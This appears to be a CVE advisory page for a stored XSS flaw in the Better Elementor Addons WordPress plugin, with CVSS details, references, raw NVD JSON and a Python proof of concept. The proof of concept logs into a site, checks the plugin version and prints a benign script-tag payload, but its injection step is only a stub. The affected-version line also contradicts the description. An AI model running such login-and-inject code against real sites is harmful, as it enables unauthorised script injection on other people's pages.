Security Vulnerability Report
CVE-2025-12830 CVSS 6.4 MEDIUM

CVE-2025-12830

Published: 2025-12-12 04:15:40
Last Modified: 2026-04-15 00:35:42

Description

The Better Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Slider widget in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Better Elementor Addons < 1.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-12830 PoC - Better Elementor Addons Stored XSS
# Target: WordPress site with Better Elementor Addons plugin <= 1.5.5


def parse_version(text):
    """Turn '1.5.5' into (1, 5, 5) so versions compare numerically rather than as strings."""
    return tuple(int(part) for part in text.split('.') if part.isdigit())


def exploit_stored_xss(target_url, username, password):
    """
    Exploit the Stored XSS vulnerability in the Better Elementor Addons Slider widget.
    This PoC demonstrates how an authenticated contributor+ user can inject an XSS payload.
    """
    # XSS payload - can be placed in various Slider attributes
    xss_payload = '<script>console.log("XSS Triggered - CVE-2025-12830")</script>'

    # Step 1: Login to WordPress
    session = requests.Session()
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
    }
    session.post(login_url, data=login_data, allow_redirects=True)
    # WordPress names its auth cookie wordpress_logged_in_<hash>, so match on the prefix
    if not any(name.startswith('wordpress_logged_in') for name in session.cookies.get_dict()):
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Create or edit a page with Elementor
    # This would require Elementor Editor API interaction
    # The actual exploitation happens when adding a Slider widget with XSS in attributes
    # Example XSS injection points in Slider widget:
    # - Slider link URL field
    # - Slide title/description fields
    # - Image alt text
    # - Custom CSS classes
    print("[*] XSS Payload to inject:", xss_payload)
    print("[*] Injection point: Slider widget attributes in Elementor editor")
    print("[*] Required permission: Contributor or higher")

    # Step 3: Verify the stored XSS
    # After saving, any user viewing the page will trigger the XSS
    return True


def verify_vulnerability(target_url):
    """Verify if the target is vulnerable by checking the plugin version."""
    # Check plugin version via the WordPress REST API
    # (the /wp/v2/plugins endpoint only answers to a logged-in user allowed to manage plugins)
    plugin_info_url = f"{target_url}/wp-json/wp/v2/plugins/better-elementor-addons"
    try:
        response = requests.get(plugin_info_url, timeout=10)
        if response.status_code == 200:
            data = response.json()
            version = data.get('version', 'unknown')
            print(f"[*] Detected Better Elementor Addons version: {version}")
            if version != 'unknown' and parse_version(version) <= parse_version('1.5.5'):
                print("[!] Target appears to be vulnerable")
                return True
    except (requests.RequestException, ValueError):
        pass
    print("[*] Could not determine plugin version")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-12830-poc.py <target_url> <username> <password>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    print(f"[*] Testing CVE-2025-12830 on {target}")
    if verify_vulnerability(target):
        exploit_stored_xss(target, user, pwd)
```

References

https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style1.php#L19
https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style2.php#L17
https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style5.php#L12
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432917%40better-elementor-addons&new=3432917%40better-elementor-addons&sfp_email=&sfph_mail=
https://wordpress.org/plugins/better-elementor-addons/
https://www.wordfence.com/threat-intel/vulnerabilities/id/d714d740-d7e0-49fd-af08-b4a80c9d0599?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12830",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-12T04:15:40.130",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Better Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Slider widget in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style1.php#L19",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style2.php#L17",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style5.php#L12",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432917%40better-elementor-addons&new=3432917%40better-elementor-addons&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/better-elementor-addons/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d714d740-d7e0-49fd-af08-b4a80c9d0599?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```